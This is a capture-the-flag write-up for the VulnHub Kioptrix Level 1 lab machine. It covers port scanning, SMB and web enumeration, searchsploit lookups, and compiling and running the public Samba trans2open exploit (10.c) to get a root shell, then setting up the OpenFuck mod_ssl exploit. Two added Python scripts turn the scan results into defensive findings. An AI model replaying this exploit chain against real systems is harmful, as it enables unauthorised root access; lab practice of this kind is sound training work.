# VulnHub-Kioptrix Level 1: An Ancient Apache Vuln
## Overview

| Name | Template |
| --- | --- |
| Release Date | 2024-02-24 |
| Write-up Author | Kill3r |
| Machine Author | Kill3r |
| Difficulty | Medium |
| User Flag | |
| Root Flag | |
| Link | https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ |
## Related skills

1. SMB exploit
2. mod_ssl exploit
## Weak points

1. Handling the gcc compilation

## Nmap scan

```bash
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.9 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
nmap -p$ports -sV -sC -O 10.10.10.9 -oN nmap.txt
```
The first command scans every port on the target (1 to 65535): `--min-rate=1000` sends at least 1000 packets per second and `-T4` selects the aggressive timing template. `grep -oE '(^[0-9][^/tcp]*)'` pulls the port numbers out of the output, and `tr '\n' ','` joins them into a comma-separated string. The second command rescans only those ports: `-p$ports` passes the extracted list, `-sV` performs service version detection, `-sC` runs the default NSE scripts to probe for common issues, `-O` performs OS detection, and `-oN nmap.txt` saves the results to `nmap.txt`.

```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.101 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')

┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.56.101 -oN nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-04 20:27 CST
Nmap scan report for 10.10.10.9
Host is up (0.00022s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods: 
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2023-08-04T12:29:55+00:00; +1m50s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: 1m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.82 seconds
```
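Read from the defender's side, the scan above is a checklist of protocols that should have been retired: SSHv1, SSLv2 with export-grade ciphers, the TRACE method and a certificate that expired in 2010. The following is an added Python example, not code from the original write-up: it re-implements the port-extraction step of the shell pipeline (`grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ','`) in Python and then walks the NSE script lines of an `nmap -oN` report to produce those findings per port. The report string is a constructed excerpt of the output shown above; the function names and the set of indicators checked are assumptions made for this example.

```python
"""Turn an `nmap -sV -sC -oN` report into a legacy-service checklist.

Added example, not part of the original write-up. The port extraction mirrors
the write-up's grep/tr pipeline; the findings walk the NSE script output that
follows each port line.
"""
from __future__ import annotations

import re
from datetime import datetime, timezone

# Constructed sample: an excerpt of the nmap -oN report shown in the write-up.
SAMPLE_REPORT = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
"""

# A port line: "<port>/<proto>  <state>  <service>  <version...>".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def open_ports(report: str) -> list[int]:
    """Equivalent of the grep/tr pipeline: the open port numbers, in order."""
    ports = []
    for line in report.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            ports.append(int(m.group(1)))
    return ports


def port_spec(report: str) -> str:
    """The comma-joined list the write-up feeds back into `nmap -p$ports`."""
    return ",".join(str(p) for p in open_ports(report))


def legacy_findings(report: str, now: datetime | None = None) -> list[tuple[int, str]]:
    """(port, finding) pairs for protocol and configuration weaknesses.

    Script output lines start with '|' and belong to the most recent port
    line, so the parser tracks the current port while walking the report.
    """
    now = now or datetime.now(timezone.utc)
    findings = []
    port = None
    for line in report.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port = int(m.group(1))
            continue
        if port is None or not line.startswith("|"):
            continue
        body = line.lstrip("|_ ").strip()  # drop the NSE tree prefix
        if body.startswith("sshv1:") and "supports SSHv1" in body:
            findings.append((port, "SSHv1 enabled"))
        elif body == "SSLv2 supported":
            findings.append((port, "SSLv2 enabled"))
        elif body.startswith("SSL2_") and "EXPORT" in body:
            findings.append((port, f"export-grade cipher {body}"))
        elif body.startswith("Potentially risky methods:"):
            methods = body.split(":", 1)[1].split()
            findings.append((port, "risky HTTP methods: " + ",".join(methods)))
        elif body.startswith("Not valid after:"):
            expiry = datetime.fromisoformat(body.split(":", 1)[1].strip())
            if expiry.replace(tzinfo=timezone.utc) < now:
                findings.append((port, f"certificate expired {expiry.date()}"))
    return findings


if __name__ == "__main__":
    print("open ports:", port_spec(SAMPLE_REPORT))
    for port, text in legacy_findings(SAMPLE_REPORT):
        print(f"{port:>5}  {text}")
```

Pointing `legacy_findings` at the full `nmap.txt` instead of the excerpt yields the same five findings for this host; the indicator list is deliberately small and is the part to extend for your own environment.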
## Enumeration

### SMB enumeration

> Ports: 139 389 445 636
> `enum4linux -a/-A 127.0.0.1`
```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─$ enum4linux -A 10.10.10.9
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Aug  4 20:29:56 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.10.9
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 =============================( Enumerating Workgroup/Domain on 10.10.10.9 )=============================

[+] Got domain/workgroup name: MYGROUP

 ====================================( Session Check on 10.10.10.9 )====================================

[+] Server 10.10.10.9 allows sessions using username '', password ''

 =================================( Getting domain SID for 10.10.10.9 )=================================

Domain Name: MYGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup

enum4linux complete on Fri Aug  4 20:29:56 2023
```
```bash
msf6 > use auxiliary/scanner/smb/smb_version
[*] 10.10.10.9:139      - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 10.10.10.9:139      - Host could not be identified: Unix (Samba 2.2.1a)
[*] 10.10.10.9:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 > use auxiliary/scanner/smb/smb_enumshares
[*] 10.10.10.9:139      - Starting module
[*] 10.10.10.9:445      - Starting module
[*] 10.10.10.9:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 > use auxiliary/scanner/smb/smb_lookupsid
[*] 10.10.10.9:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### Web

> HTTP web server, ports like: 80 443 81 8080 8443 4443 8081

Finger: obtains information about a specific user, or the list of users and configuration information on a system.
`whatweb` identifies and analyses a target site's technology stack, CMS (content management system), plugins, frameworks and other site-related information by inspecting the site's responses and page content.

```bash
┌──(root㉿kill3r)-[~]
└─# whatweb 10.10.10.9
http://10.10.10.9 [200 OK] Apache[1.3.20][mod_ssl/2.8.4], Country[RESERVED][ZZ], Email[webmaster@example.com], HTTPServer[Red Hat Linux][Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b], IP[10.10.10.9], OpenSSL[0.9.6b], Title[Test Page for the Apache Web Server on Red Hat Linux]
```
- Directory enumeration
  - `dirb http://192.168.56.101`
  - `dirsearch -u http://192.168.56.101 -r`
  - `gobuster dir -w ... -u http://192.168.56.101 -x html,php,js,bak`

```bash
┌──(root㉿kill3r)-[~]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.9 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.9
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,php,js,bak
[+] Timeout:                 10s
===============================================================
2023/08/04 22:41:08 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 269]
/index.html           (Status: 200) [Size: 2890]
/test.php             (Status: 200) [Size: 27]
/manual               (Status: 301) [Size: 294] [--> http://127.0.0.1/manual/]
/usage                (Status: 301) [Size: 293] [--> http://127.0.0.1/usage/]
/mrtg                 (Status: 301) [Size: 292] [--> http://127.0.0.1/mrtg/]
/.html                (Status: 403) [Size: 269]
Progress: 1100338 / 1102805 (99.78%)
===============================================================
2023/08/04 22:46:47 Finished
===============================================================
```
```bash
$ nikto -h http://www.example.com/
$ nuclei -u https://example.com/
```
### Wordlist

- cewl.list: `cewl http://192.168.56.101/ -w dict.txt`
- pass.list
- hash.list
- information.list
### Wappalyzer

```plaintext
Web server: Apache HTTP Server 1.3.20
Operating system: UNIX
Web server extension: OpenSSL 0.9.6b
mod_ssl: 2.8.4
```
## Reproduction

### Visit the target and look for functionality

No functionality found; move on to analysing the other services.

### Information analysis

### SMB

- Samba 2.2.1a

```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─$ searchsploit Samba 2.2.1a
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                | osx/remote/9924.rb
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution                           | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow                                       | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                               | linux_x86/dos/36741.py
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
```
In the end, testing showed that 10.c works and yields a shell directly.
```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─$ gcc 10.c -o samba

┌──(root㉿kill3r)-[/home/kill3r]
└─$ ./samba -b O 10.10.10.9
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10
uid=0(root) gid=0(root) groups=99(nobody)
```
### mod_ssl

```bash
┌──(root㉿kill3r)-[~/.ssh]
└─# searchsploit mod_ssl 2.8.4
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow        | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)  | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)  | unix/remote/47080.c
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

┌──(root㉿kill3r)-[/home/kill3r]
└─# gcc -o OpenFuck 47080.c -lcrypto

┌──(root㉿kill3r)-[/home/kill3r]
└─# ./OpenFuck -h | grep apache-1.3.20
	0x02 - Cobalt Sun 6.0 (apache-1.3.20)
	0x27 - FreeBSD (apache-1.3.20)
	0x28 - FreeBSD (apache-1.3.20)
	0x29 - FreeBSD (apache-1.3.20+2.8.4)
	0x2a - FreeBSD (apache-1.3.20_1)
	0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
	0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
	0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
	0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
	0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
	0x7e - Slackware Linux 8.0 (apache-1.3.20)
	0x86 - SuSE Linux 7.3 (apache-1.3.20)

┌──(root㉿kill3r)-[/home/kill3r]
└─# ./OpenFuck 0x6b 10.10.10.9
```
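The information-analysis step above is done by eye twice: the Samba banner `2.2.1a` is placed inside the `Samba < 2.2.8` range, and `mod_ssl/2.8.4` inside `Apache mod_ssl < 2.8.7`. For patch triage across an inventory a defender wants that comparison automated, including the letter-suffix releases these projects use. The following is an added Python example, not code from the write-up: it parses the `< version` ranges out of the searchsploit titles listed in the two outputs above, extracts `name/version` components from the banners collected during enumeration, and reports which components fall inside an affected range. The regexes, function names and the suffix ordering rule (`2.2.8a` sorts after `2.2.8`) are assumptions made for this example, and the banner `Samba 2.2.8a` is a hypothetical value used to show a version that falls outside the `< 2.2.8` ranges.

```python
"""Check banner versions against the '< version' ranges in searchsploit titles.

Added example, not part of the original write-up. Regexes, function names and
the suffix ordering rule are assumptions made here.
"""
import re

# Constructed from the enumeration output above: one banner per source.
BANNERS = [
    "Unix (Samba 2.2.1a)",                                                 # smb_version
    "Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b",  # Server header
]

# Hypothetical banner for a host on the first fixed Samba release.
PATCHED_BANNER = "Unix (Samba 2.2.8a)"

# Titles copied from the two searchsploit listings above.
TITLES = [
    "Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)",
    "Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",
    "Samba < 3.0.20 - Remote Heap Overflow",
    "Samba < 3.6.2 (x86) - Denial of Service (PoC)",
    "Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow",
    "Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)",
    "Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)",
]

# 'name/1.2.3' or 'name 1.2.3' tokens inside a banner string.
COMPONENT_RE = re.compile(r"([A-Za-z_]+)[/ ](\d[\w.]*)")
# Dotted numeric version with an optional letter suffix: 2.2.1a, 0.9.6b, 2.9p2.
VERSION_RE = re.compile(r"(\d+(?:\.\d+)*)([a-z]\d*)?")
# 'Product < high' or 'Product low < high', the forms searchsploit uses above.
TITLE_RE = re.compile(r"^(?P<product>.+?)\s+(?:(?P<low>\d[\w.]*)\s+)?<\s*(?P<high>\d[\w.]*)")


def version_key(text):
    """Sortable key: numeric parts as ints, then the suffix.

    An empty suffix sorts before a letter, so 2.2.8 < 2.2.8a, which is how
    Samba and OpenSSL number their letter releases.
    """
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(part) for part in m.group(1).split(".")), m.group(2) or ""


def components(banner):
    """(name, version) pairs found in a banner, e.g. ('mod_ssl', '2.8.4')."""
    return COMPONENT_RE.findall(banner)


def parse_title(title):
    """(product, low, high) from a searchsploit title, or None if no '<' range.

    The product is reduced to its last word ('Apache mod_ssl' -> 'mod_ssl')
    so it can be compared with the component name taken from the banner.
    """
    m = TITLE_RE.match(title)
    if not m:
        return None
    return m.group("product").split()[-1].lower(), m.group("low"), m.group("high")


def affected(version, low, high):
    """True if low <= version < high (low may be None for an open lower bound)."""
    key = version_key(version)
    if low is not None and key < version_key(low):
        return False
    return key < version_key(high)


def match_titles(banner, titles):
    """(component, version, title) for every title whose range covers the banner."""
    hits = []
    for name, version in components(banner):
        for title in titles:
            parsed = parse_title(title)
            if parsed and parsed[0] == name.lower() and affected(version, parsed[1], parsed[2]):
                hits.append((name, version, title))
    return hits


if __name__ == "__main__":
    for banner in BANNERS + [PATCHED_BANNER]:
        print(banner)
        for name, version, title in match_titles(banner, TITLES):
            print(f"  {name} {version}  <-  {title}")
```

The product match is deliberately loose (last word of the title against the banner component name), which suits banners that embed `name/version` pairs such as the Apache `Server` header; a title whose range uses `<=` or a bare version would need `TITLE_RE` extended.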
## Flag as user1

## Shell as user1

## Shell as user2

## Shell as root

> Save a screenshot as the flag or proof.